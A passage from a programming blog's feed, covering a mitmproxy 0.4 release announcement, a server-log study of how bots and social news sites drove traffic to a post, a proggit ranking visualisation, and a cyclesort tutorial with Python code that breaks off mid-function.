pedestrian means of modifying the saved score on your jailbroken phone, then
2^31-1 might well be the maximum score you could get. Then again, if the game
itself stores its score in a signed 32-bit int, you could get the same score
through perfect play, effectively beating the game. So, which is it in this
case? I'll leave that for you to decide.</p>
mitmproxy 0.4 has been released
2011-03-30T00:00:00+00:00
2011-03-30T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_4/
<div class="media">
<a href="../mitmproxy_0_4.png">
<img src="../mitmproxy_0_4.png" />
</a>
</div>
<p>I've just tagged and released mitmproxy 0.4. You can download it from the new
project website:</p>
<h2 id="mitmproxy-org"><a href="http://mitmproxy.org">mitmproxy.org</a></h2>
<p>This is a huge update, with dozens
of new features, and improvements to almost every aspect of the project. A few
highlights are:</p>
<ul>
<li>Complete serialization of HTTP/S conversations</li>
<li>On-the-fly generation of SSL interception certificates</li>
<li>Ability to replay both the client and the server side of HTTP/S conversations</li>
<li>mitmdump has grown up to be a powerful tcpdump-like commandline tool for HTTP/S</li>
<li>Scripting hooks for programmatic modification of traffic using Python</li>
<li>Many, many user interface improvements, bug fixes, and minor features</li>
<li>Better <a href="http://mitmproxy.org/doc/index.html">documentation</a>.</li>
</ul>
<p>Special thanks go to <a href="http://www.henriknordstrom.net/">Henrik Nordström</a> for
many great contributions to this release. I'd love more contributors to join
the project - if you feel like hacking on mitmproxy, take a look at the
<a href="https://github.com/cortesi/mitmproxy/blob/master/todo">todo</a> file at the top
of the tree for ideas.</p>
<p>Over the next week I will write a series of tutorials to showcase mitmproxy's
abilities, ranging from simple to quite complex. Keep an eye on the blog for
these - they will be published here first, before making their way into the
official documentation.</p>
Social news eats a blog post
2011-01-24T00:00:00+00:00
2011-01-24T00:00:00+00:00
https://corte.si/posts/socialmedia/post-lifecycle/
<p>This is the second post in which I try to add some data to my nagging doubts
about the technical news ecosystem. In my <a href="https://corte.si/posts/socialmedia/redditgraph/">previous
post</a>, I showed off a visualisation of
how the proggit front page changes over time. In this post, I take a look at the
flip-side of the coin - what happens to a specific post as it passes through the
short, fickle social news cycle? To do this, I'll take a deep dive into my own
server logs, looking at a <a href="https://corte.si/posts/code/cyclesort/">recent post of mine</a>
that appeared briefly on both <a href="http://news.ycombinator.com">Hacker News</a> and
<a href="http://www.reddit.com/r/programming%22">proggit</a>. I'd guess that nearly all posts
follow more or less the same trajectory as they are extruded through the social
news mill, so this should be interesting to more people than just me. At the
risk of making things a bit dry and descriptive, I'm saving speculation and
interpretation for a future post.</p>
<p>The scene is set at about 10pm New Zealand time, when I put the finishing
touches to my blog post, and fire off an rsync up to my server. I quickly
double-check that the blog and the RSS feed have updated OK, <a href="http://twitter.com/cortesi/status/6627667512131584">tweet a
link</a> to the post, and go to
bed. While I sleep, the post creeps onto both Hacker News and proggit,
ultimately getting 41000 hits over the next 5 days or so. The graphs below show
only the first 50 hours of the post's lifetime - everything after that is just a
long, slow dénouement as it dwindles into obscurity.</p>
<h2 id="our-real-time-robot-overlords">Our real-time robot overlords</h2>
<p>The action starts almost as soon as I click the "tweet" button. Within seconds,
the post is retrieved by Twitterbot. One second later, Googlebot appears, and
almost simultaneously I get hit by Jaxified, Njuice, LinkedIn and PostRank. In
all, 10 bots read my blog post within the first minute, handily beating the
first human, who slouches lethargically into view at a tardy 90 seconds.</p>
<p>Below is a list of the bots that retrieved my post before the first submission
to a social news site. These are the realtime robots, presumably hoovering up
the Twitter firehose and indexing all the links they find. The cast of
characters is a mixture of the expected big fish, stealth startups, and
skunkworks projects at well-known companies. Bot identity was gleaned from HTTP
<a href="http://en.wikipedia.org/wiki/User_agent">user-agent</a> headers when they were
provided, or by checking the ownership of the responsible IP through reverse DNS
resolution and whois lookups when they weren't. Most of the real-time bots were
well behaved, identifying themselves clearly with a URL in the user-agent
string.</p>
<style>
.soctable td {
padding-left: 0 !important;
}
</style>
<table class="soctable">
<tr>
<th>minutes after publication</th>
<th>bot</th>
</tr>
<tr>
<td rowspan="10">1</td> <td><a href="http://twitter.com">Twitter</a></td>
</tr>
<tr>
<td><a href="http://www.google.com/bot.html">Google</a></td>
</tr>
<tr>
<td><a href="http://www.jaxified.com/crawler">Jaxified</a></td>
</tr>
<tr>
<td><a href="http://njuice.com/">NJuice</a></td>
</tr>
<tr>
<td><a href="http://www.linkedin.com">LinkedIn</a></td>
</tr>
<tr>
<td><a href="http://www.postrank.com/">PostRank</a></td>
</tr>
<tr>
<td>Unidentified bot from a Microsoft-owned IP</td>
</tr>
<tr>
<td><a href="http://help.yahoo.com/help/us/ysearch/slurp">Yahoo! Slurp</a></td>
</tr>
<tr>
<td>Unidentified bot from a <a
href="http://www.bbc.co.uk/blogs/rad/">BBC RAD labs</a> IP.
</td>
</tr>
<tr>
<td><a href="http://www.oneriot.com/">OneRiot</a></td>
</tr>
<tr>
<td rowspan="4">2</td> <td><a href="http://friendfeed.com/about/bot">FriendFeed</a></td>
</tr>
<tr>
<td><a href="http://www.kosmix.com/">Kosmix</a></td>
</tr>
<tr>
<td><a href="http://labs.topsy.com/butterfly/">Topsy Butterfly</a></td>
</tr>
<tr>
<td>Unidentified bot from <a href="http://marban.com">marban.com</a> subdomain. (PoPUrls?)</td>
</tr>
<tr>
<td rowspan="2">3</td> <td><a href="http://metauri.com/">metauri.com</a></td>
</tr>
<tr>
<td><a href="http://search.msn.com/msnbot.htm">msnbot</a></td>
</tr>
<tr>
<td rowspan="2">6</td> <td><a href="http://summify.com">Summify</a></td>
</tr>
<tr>
<td>Bot identifying itself just as "NING", can't confirm that it's <a
href="http://www.ning.com/">the Ning</a>. </td>
</tr>
<tr>
<td>9</td> <td><a href="http://tineye.com/crawler.html">tineye</a></td>
</tr>
<tr>
<td>26</td> <td><a href="http://spinn3r.com/robot">spinn3r.com</a></td>
</tr>
<tr>
<td>27</td> <td><a href="http://www.backtype.com/">backtype.com</a></td>
</tr>
<tr>
<td>47</td> <td><a href="http://www.facebook.com/externalhit_uatext.php">facebookexternalhit</a></td>
</tr>
</table>
<h2 id="enter-the-heavyweights-hacker-news-and-reddit">Enter the heavyweights: Hacker News and Reddit</h2>
<p>48 minutes after the post was published, the first hit from a social news site
appears: hello <a href="http://news.ycombinator.com">Hacker News</a>. The post
quickly makes it onto the front page, and HN traffic peaks at 399 hits per hour
in the second hour after publication. All told, the post got 2337 hits with a
HN <a href="http://en.wikipedia.org/wiki/HTTP_referrer">referrer header</a>.</p>
<div class="media">
<a href="ycombinator.png">
<img src="ycombinator.png" />
</a>
<div class="subtitle">
news.ycombinator.com
</div>
</div>
<p>Two hours and three minutes after publication, the real monster of social news
arrives: the first hit from Reddit appears. The Reddit traffic peaks in the
sixth hour after publication at 3025 hits per hour, and delivers a total of
23807 hits in the 51 hours after publication.</p>
<div class="media">
<a href="reddit.png">
<img src="reddit.png" />
</a>
<div class="subtitle">
reddit.com/r/programming
</div>
</div>
<h2 id="the-long-tail">The long tail</h2>
<p>Reddit accounted for the vast majority of the post's traffic, dwarfing all
other sources combined. In all, I received only 2300 hits with specified
referrer headers that weren't Reddit or HN. Here are all the referrers that
were responsible for more than 10 hits to the post:</p>
<table>
<tr><th>hits</th><th>site</th></tr>
<tr><th>456</th> <td><a href="http://popurls.com">popurls.com</a></td></tr>
<tr><th>359</th> <td><a href="http://www.google.com/reader">Google Reader</a></td></tr>
<tr><th>282</th> <td><a href="http://twitter.com">Twitter</a></td></tr>
<tr><th>196</th> <td><a href="http://jimmyr.com">jimmyr.com</a></td></tr>
<tr><th>183</th> <td><a href="http://delicious.com">delicious</a></td></tr>
<tr><th>153</th> <td><a href="http://pop.is">pop.is</a></td></tr>
<tr><th>139</th> <td><a href="http://www.google.com">Google Search</a></td></tr>
<tr><th>82</th> <td><a href="http://www.wired.com">wired.com</a></td></tr>
<tr><th>56</th> <td><a href="http://www.facebook.com">Facebook</a></td></tr>
<tr><th>36</th> <td><a href="http://longurl.com">longurl.com</a></td></tr>
<tr><th>36</th> <td><a href="http://glozer.net/trendy">glozer.net/trendy</a></td></tr>
<tr><th>30</th> <td><a href="http://oursignal.com">oursignal.com</a></td></tr>
<tr><th>28</th> <td><a href="http://hackurls.com">hackurls.com</a></td></tr>
<tr><th>24</th> <td><a href="http://pipes.yahoo.com">Yahoo Pipes</a></td></tr>
<tr><th>18</th> <td><a href="http://www.netvibes.com">www.netvibes.com</a></td></tr>
<tr><th>15</th> <td><a href="http://dzone.com">dzone.com</a></td></tr>
<tr><th>11</th> <td><a href="http://www.freshnews.com">www.freshnews.org</a></td></tr>
</table>
<p>It's interesting to see that I got nearly 200 hits from delicous.com. By
contrast, <a href="http://pinboard.in">pinboard.in</a> - which seems to be delicous.com's
anointed successor - sent me only two hits. Then again, my post was published
in late November 2010, about a month before Yahoo <a href="http://techcrunch.com/2010/12/16/is-yahoo-shutting-down-del-icio-us/">spectacularly
hobbled</a>
their bookmarking property. I wonder what those figures would look like today.</p>
<p>The thin end of the long tail are the 200 hits from 94 sites that were
responsible for 10 or fewer hits each. We can break this motley crew up into a
few different classes:</p>
<ul>
<li>Sites that provide some sort of social news analysis, piggy-backing off HN,
Reddit and delicious.com. For example, <a href="http://popacular.com">popacular.com</a>,
<a href="http://seesmic.com">seesmic.com</a>, <a href="http://hotgrog.com">hotgrog.com</a>.</li>
<li>URL shorteners like <a href="http://j.mp">j.mp</a> and unshorteners like
<a href="http://unitny.me">untiny.me</a></li>
<li>Social media-ish services like <a href="http://friendfeed.com">FriendFeed</a>,
<a href="http://stumbleupon.com">StumbleUpon</a>, <a href="http://pinboard.in">pinboard.in</a></li>
<li>Tiny personal blogs.</li>
<li>And, surprisingly - a number of sites that just provide an alternative
interface or URL for Hacker News: <a href="http://hackerne.ws/">hackerne.ws</a>,
<a href="http://ihackernews.com/">ihackernews.com</a>,
<a href="http://hacker-newspaper.gilesb.com/">hacker-newspaper.gilesb.com</a>,
<a href="http://www.icombinator.net/">www.icombinator.net</a>.</li>
</ul>
<h2 id="robot-scavengers-of-the-social-news-ecosphere">Robot scavengers of the social news ecosphere</h2>
<p>Let's take a look at overall bot traffic, separating out our silicone friends by
looking for non-human and non-standard user-agent headers. The moment the post
hits the HN front page bot traffic spikes, and this spike continues as the post
is submitted to Reddit and starts its climb up the proggit front page.</p>
<div class="media">
<a href="robots.png">
<img src="robots.png" />
</a>
<div class="subtitle">
robots
</div>
</div>
<p>Enter the robot scavengers of the social news ecosphere - a set of second-tier
aggregators that monitor social news and Twitter for hot stories. Here's a
sample of bot visitors, taken more or less at random from the logs:</p>
<table>
<tr><td><a href="http://inagist.com">inagist.com</a></td>
<td><a href="http://www.netvibes.com">www.netvibes.com</a></td>
<td><a href="http://chattertrap.com">chattertrap.com</a></td>
<td><a href="http://twingly.com">twingly.com</a></td></tr>
<tr><td><a href="http://coder.io">coder.io</a></td>
<td><a href="http://newsmagpie.com">newsmagpie.com</a></td>
<td><a href="http://worio.com">worio.com</a></td>
<td><a href="http://www.myvbo.com">www.myvbo.com</a></td></tr>
<tr><td><a href="http://www.zemanta.com">www.zemanta.com</a></td>
<td><a href="http://embed.ly">embed.ly</a></td>
<td><a href="http://brandwatch.net">brandwatch.net</a></td>
<td><a href="http://www.flipboard.com">www.flipboard.com</a></td></tr>
<tr><td><a href="http://paper.li">paper.li</a></td>
<td><a href="http://rivva.de">rivva.de</a></td>
<td><a href="http://attribyte.com">attribyte.com</a></td>
<td><a href="http://diffbot.com">diffbot.com</a></td></tr>
<tr><td><a href="http://yoono.com">yoono.com</a></td>
<td><a href="http://hatena.net.jp">hatena.net.jp</a></td>
<td><a href="http://hourlypress.com">hourlypress.com</a></td>
<td><a href="http://longurl.org">longurl.org</a></td></tr>
<tr><td><a href="http://untiny.me">untiny.me</a></td>
<td><a href="http://goo.ne.jp">goo.ne.jp</a></td>
<td><a href="http://www.baidu.com">www.baidu.com</a></td>
<td><a href="http://sharethis.com">sharethis.com</a></td></tr>
<tr><td><a href="http://ideashower.com">ideashower.com</a></td>
<td><a href="http://pannous.info">pannous.info</a></td>
<td><a href="http://wikiwix.com">wikiwix.com</a></td>
<td><a href="http://pipes.yahoo.com">pipes.yahoo.com</a></td></tr>
<tr><td><a href="http://mustexist.com">mustexist.com</a></td>
<td><a href="http://pics.fefoo.com">pics.fefoo.com</a></td>
<td><a href="http://cyber.law.harvard.edu">cyber.law.harvard.edu</a></td>
<td><a href="http://seatgeek.com">seatgeek.com</a></td></tr>
<tr><td><a href="http://metadatalabs.com">metadatalabs.com</a></td>
<td><a href="http://moreover.com">moreover.com</a></td>
<td><a href="http://thinglabs.com">thinglabs.com</a></td>
<td><a href="http://stufftotweet.com">stufftotweet.com</a></td></tr>
<tr>
<td><a href="http://chilitweets.com">chilitweets.com</a></td>
<td><a href="http://bkluster.hut.edu.vn">bkluster.hut.edu.vn</a></td>
<td><a href="http://wikio.com">wikio.com</a></td>
<td><a href="http://pipes.yahoo.com">Yahoo Pipes</a></td>
</tr>
<tr>
<td><a href="http://zite.com">zite.com</a></td>
<td><a href="http://zelist.ro">zelist.ro</a></td>
<td><a href="http://buzzzy.com">buzzzy.com</a></td>
<td><a href="http://intravnews.com">intravnews.com</a></td>
</tr>
</table>
<p>At this point, I'd like to bitch a bit about how astonishingly badly behaved
some of the automated systems skulking around today's web are. The vast, vast
majority don't provide any clue about the responsible entity in the user-agent
string. The list above consists of responsible bots that do identify
themselves, and less responsible ones that I could identify through reverse
domain resolution. Most of the irresponsible bots come from Amazon Web
Services, which seems to be a right wretched hive of scum and villainy. The
worst performers here boggle the mind - about a dozen hosts from AWS retrieved
the blog post more than 200 times a day, all using full GET requests, without
an If-Modified-Since header, and with no identification. The arch-villain hit
the post 600 times in its first 24 hours - that's about once every 2.5 minutes.</p>
<h2 id="referrer-less-viewers-and-stealthy-bots">Referrer-less viewers and stealthy bots</h2>
<p>I was surprised to see that almost 20% of requests not identified as bot
requests had no specified referrer, a much greater percentage than I would have
anticipated. Here's a graph showing the number of referrer-less requests per
hour:</p>
<div class="media">
<a href="noreferrer.png">
<img src="noreferrer.png" />
</a>
<div class="subtitle">
requests without a referrer
</div>
</div>
<p>It looks like the double-peak in this graph coincides with the traffic peaks
from HN and Reddit. This suggests that the majority of these hits do in fact
come (perhaps indirectly) from HN and Reddit users. One possibility is that a
chunk of this referrer-less traffic comes from non-browser Twitter clients.</p>
<p>A fraction of the referrer-less traffic also comes from stealthy bots sending
user-agent strings that match those of desktop browsers. About 5% of these
requests, for example, come from the Amazon EC2 cloud, so are unlikely to be
real browsers. One Internet darling that does this is Instapaper, which seems
to use the requesting client's user-agent string rather than frankly confessing
itself to be a bot. It also appears to re-request an article in full for each
user, rather than simply checking if there's been a change and using a cached
copy. On the upside, this means that I know that 131 readers used Instapaper to
view my post.</p>
<h2 id="aftermath">Aftermath</h2>
<p>After the post drifts off the proggit and HN front pages, traffic dies down.
There's a dwindling tail of stragglers that bothered to flip through to the
second or third page of top stories, and a tiny dribble of users who discovered
the link through other sources. A month later, the post gets about 60 hits per
day, of which more than a third are from bots. Non-bot traffic is still
dominated by Reddit, presumably from people searching or idly flicking through
Reddit's history.</p>
<p>So, in the end, after my once-thrumming server quiets down, what has the
lasting effect been on my own social graph? I had a small surge of Twitter
follows, going from 230 to 245 followers. There was a minor blip of subscribers
to my RSS feed, with Google Reader reporting subscriptions going from about 510
to 551. Out of 33,000 unique visitors 56 decided to cultivate a more permanent
relationship of some sort to my blog. That's 1 in 600. If you remember only one
figure from this post, this should be it.</p>
A journey through the bowels of proggit
2011-01-12T00:00:00+00:00
2011-01-12T00:00:00+00:00
https://corte.si/posts/socialmedia/redditgraph/
<div class="media">
<a href="proggit4.png">
<img src="proggit4.png" />
</a>
<div class="subtitle">
proggit - 4 hours
</div>
</div>
<p>I've had a nagging sense of dissatisfaction with my information diet lately, and
it's becoming clear that over-reliance on social news sites like Reddit and
Hacker News (much as I love them) lies at the heart of my discontent. For the
past few months, I've been gathering data to help me come up with a coherent
explanation for my malaise. I'm still working on it, so this post will have no
conclusions, only repulsive metaphors and pretty pictures.</p>
<p>For a week or so in November I logged the slow, peristaltic progress of stories
through the bowels of <a href="http://www.reddit.com/r/programming">proggit</a>, watching
them get nudged this way and that by the malodorous, hot gas of public opinion
before finally being shunted on to the colon of the second page of results. In
other words, I sampled the top 25 stories every 5 minutes through the RSS feed.
One of the things I was interested in was how submission rankings changed over
time, so I visualised the dataset using the same technique I came up with to
<a href="http://sortvis.org">visualise sorting algorithms</a>. The image above shows 4
hours of proggit, with each submission represented by a line. The lines are
coloured based on the average rank the story achieves over its lifetime in the
top 25, ranging between upvote orange for top stories, and downvote blue for
bottom stories.</p>
<p>Here's a bigger sample - 72 hours of data embedded in a widget to let you zoom
and pan around. The busy cut-and-thrust of life on reddit is all here. The
meteoric rise, inevitably followed by long, slow decay. The sudden, mysterious,
mid-flight disappearances. The jostling and writhing among the bottom
submissions that never quite manage to make it into the big leagues. Heady
stuff. Click to view:</p>
<div class="media">
<a href="proggit72.png">
<img src="mini72.png" />
</a>
<div class="subtitle">
proggit - 72 hours
</div>
</div>
<p>Perhaps I'll do an expanded version that lets you view submission titles, times
and so forth later on.</p>
Cyclesort - a curious little sorting algorithm
2010-11-22T00:00:00+00:00
2010-11-22T00:00:00+00:00
https://corte.si/posts/code/cyclesort/
<p>One of the nice things about building <a href="http://sortvis.org">sortvis.org</a> and
writing the posts that led up to it is that people email me with pointers to
esoteric algorithms I've never heard of. Today's post is dedicated to one of
these - a curious little sorting algorithm called
<a href="http://en.wikipedia.org/wiki/Cycle_sort">cyclesort</a>. It was described in 1990
in a <a href="http://comjnl.oxfordjournals.org/content/33/4/365.full.pdf">3-page paper by B.K.
Haddon</a>, and has
become a firm favourite of mine.</p>
<p>Cyclesort has some nice properties - for certain restricted types of data it
can do a stable, in-place sort in linear time, while guaranteeing that each
element will be moved at most once. But what I really like about this algorithm
is how naturally it arises from a simple theorem on <a href="http://mathworld.wolfram.com/SymmetricGroup.html">symmetric
groups</a>. Bear with me while
I work up to the algorithm through a couple of basic concepts.</p>
<h2 id="cycles">Cycles</h2>
<p>Lets start with the definition of a
<a href="http://mathworld.wolfram.com/PermutationCycle.html">cycle</a>. A cycle is a subset
of elements from a permutation that have been rotated from their original
position. So, say we have an ordered set <strong>[0, 1, 2, 3, 4]</strong>, and a cycle <strong>[0,
3, 1]</strong>. The cycle defines a rotation where element 0 moves to position 3, 3 to
1 and 1 to 0. Visually, it looks like this:</p>
<div class="media">
<a href="graph1.png">
<img src="graph1.png" />
</a>
</div>
<p>We can apply a cycle to an ordered set to obtain a permutation, and we can then
reverse that cycle to re-obtain the original set. Here's a Python function that
applies a cycle to a list in-place:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">apply_cycle</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">lst</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">c</span><span style="color:#c0c5ce;">):
</span><span style="color:#65737e;"># Extract the cycle's values
</span><span style="color:#c0c5ce;">vals = [lst[i] </span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">i </span><span style="color:#b48ead;">in </span><span style="color:#c0c5ce;">c]
</span><span style="color:#65737e;"># Rotate them circularly by one position
</span><span style="color:#c0c5ce;">vals = [vals[-</span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">]] + vals[:-</span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">]
</span><span style="color:#65737e;"># Re-insert them into the list
</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">i, offset </span><span style="color:#b48ead;">in </span><span style="color:#96b5b4;">enumerate</span><span style="color:#c0c5ce;">(c):
lst[offset] = vals[i]
</span></code></pre>
<p>Here's an interactive session showing the function in action:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">>>> lst = [</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">2</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">3</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">4</span><span style="color:#c0c5ce;">]
>>> c = [</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">3</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">]
>>> </span><span style="color:#bf616a;">apply_cycle</span><span style="color:#c0c5ce;">(lst, c)
>>> lst
[</span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">3</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">2</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">4</span><span style="color:#c0c5ce;">]
>> c.</span><span style="color:#bf616a;">reverse</span><span style="color:#c0c5ce;">()
>> </span><span style="color:#bf616a;">apply_cycle</span><span style="color:#c0c5ce;">(lst, c)
>> lst
[</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">2</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">3</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">4</span><span style="color:#c0c5ce;">]
</span></code></pre><h2 id="permutations">Permutations</h2>
<p>Now, it's a fascinating fact that <strong>any permutation can be decomposed into a
unique set of disjoint cycles</strong>. We can think of this as analogous to the
factorization of a number - every permutation is the product a unique set of
component cycles in the same way every number is the product of a unique set of
prime factors. Taking this as a given, how could we calculate the cycles that
make up a permutation? One obvious way to proceed is to pick a starting point,
and simply "follow" the cycle in reverse until we get back to where we started.
We know from the result above that the element is guaranteed to be part of a
cycle, so we must eventually reach our starting point again. When we do, hey
presto, we have a complete cycle. If we keep track of the elements that are
already part of a known cycle, we can skip to the next unknown element and
repeat the process. Once we reach the end of the list we're done.</p>
<p>This scheme can only work if we know where in the ordered sequence any given
element belongs, because this is the way we find the "previous hop" in a cycle.
In the examples above, we worked with lists that consist of a contiguous range
of numbers <strong>0..n</strong>, which gives us a short-cut: the element's value <em>is</em> its
offset in the ordered list. In the code below I've factored this out into a
function <strong>key</strong>, which takes an element value, and returns its correct offset - in
this case <strong>key</strong> is simply the identity function.</p>
<p>Here's a Python function that finds all cycles in permutations of numbers
ranging from <strong>0..n</strong>:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">key</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">element</span><span style="color:#c0c5ce;">):
</span><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">element
</span><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">find_cycles</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">l</span><span style="color:#c0c5ce;">):
seen = </span><span style="color:#bf616a;">set</span><span style="color:#c0c5ce;">()
cycles = []
</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">i </span><span style="color:#b48ead;">in </span><span style="color:#96b5b4;">range</span><span style="color:#c0c5ce;">(</span><span style="color:#96b5b4;">len</span><span style="color:#c0c5ce;">(l)):
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">i != </span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">(l[i]) and not i in seen:
cycle = []
n = i
</span><span style="color:#b48ead;">while </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">:
cycle.</span><span style="color:#bf616a;">append</span><span style="color:#c0c5ce;">(n)
n = </span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">(l[n])
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">n == i:
</span><span style="color:#b48ead;">break
</span><span style="color:#c0c5ce;">seen = seen.</span><span style="color:#bf616a;">union</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">set</span><span style="color:#c0c5ce;">(cycle))
cycles.</span><span style="color:#bf616a;">append</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">list</span><span style="color:#c0c5ce;">(</span><span style="color:#96b5b4;">reversed</span><span style="color:#c0c5ce;">(cycle)))
</span><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">cycles
</span></code></pre>
<p>Running it on our example permutation produces the cycle we used to produce it:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">>>> </span><span style="color:#bf616a;">find_cycles</span><span style="color:#c0c5ce;">([</span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">3</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">2</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">4</span><span style="color:#c0c5ce;">])
>>> [[</span><span style="color:#d08770;">3</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">]]
</span></code></pre>
<p>Here's <strong>find_cycles</strong> run on a longer, randomly shuffled list:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">l = [</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">5</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">6</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">8</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">7</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">4</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">9</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">3</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">2</span><span style="color:#c0c5ce;">]
>>> </span><span style="color:#bf616a;">find_cycles</span><span style="color:#c0c5ce;">(l)
>>> [[</span><span style="color:#d08770;">7</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">4</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">5</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">], [</span><span style="color:#d08770;">9</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">6</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">2</span><span style="color:#c0c5ce;">], [</span><span style="color:#d08770;">8</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">3</span><span style="color:#c0c5ce;">]]
</span></code></pre>
<p>And here's a handsomely colourful graphical version of the output above:</p>
<div class="media">
<a href="graph2.png">
<img src="graph2.png" />
</a>
</div>
<h2 id="a-sorting-algorithm-emerges">A sorting algorithm emerges</h2>
<p>Let's take a closer look at the <strong>find_cycles</strong> function above. We keep track of
elements that are already part of a cycle in the <strong>seen</strong> set, so that we can
skip them as we proceed through the list. The <strong>seen</strong> set can be as large as
the list itself, so we've doubled the memory requirement for the algorithm. If
we're allowed to destroy the input list, we can avoid explicitly tracking seen
elements by relocating elements to their correct position as we work our way
around each cycle. All the cycles are disjoint and we traverse each cycle only
once, so doing this won't affect the function's output. We can then tell that
we need to skip an element we've already seen by checking whether it's in the
correct sorted position. Here's the result:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">key</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">element</span><span style="color:#c0c5ce;">):
</span><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">element
</span><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">find_cycles2</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">l</span><span style="color:#c0c5ce;">):
cycles = []
</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">i </span><span style="color:#b48ead;">in </span><span style="color:#96b5b4;">range</span><span style="color:#c0c5ce;">(</span><span style="color:#96b5b4;">len</span><span style="color:#c0c5ce;">(l)):
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">i != </span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">(l[i]):
cycle = []
n = i
</span><span style="color:#b48ead;">while </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">:
cycle.</span><span style="color:#bf616a;">append</span><span style="color:#c0c5ce;">(n)
tmp = l[n]
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">n != i:
l[n] = last_value
last_value = tmp
n = </span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">(last_value)
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">n == i:
l[n] = last_value
</span><span style="color:#b48ead;">break
</span><span style="color:#c0c5ce;">cycles.</span><span style="color:#bf616a;">append</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">list</span><span style="color:#c0c5ce;">(</span><span style="color:#96b5b4;">reversed</span><span style="color:#c0c5ce;">(cycle)))
</span><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">cycles
</span></code></pre>
<p>But... at the end of this process, the original list is sorted! Tada: cyclesort
pops out of the shrubbery almost as a side-effect of efficiently finding all
cycles. If we're only interested in sorting, we can strip the code that saves
the cycles, which leaves us with a nice, pared-back sorting algorithm:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">key</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">element</span><span style="color:#c0c5ce;">):
</span><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">element
</span><span style="color:#b48ead;">def </span><span style="color:#8fa1b3;">cyclesort_simple</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">l</span><span style="color:#c0c5ce;">):
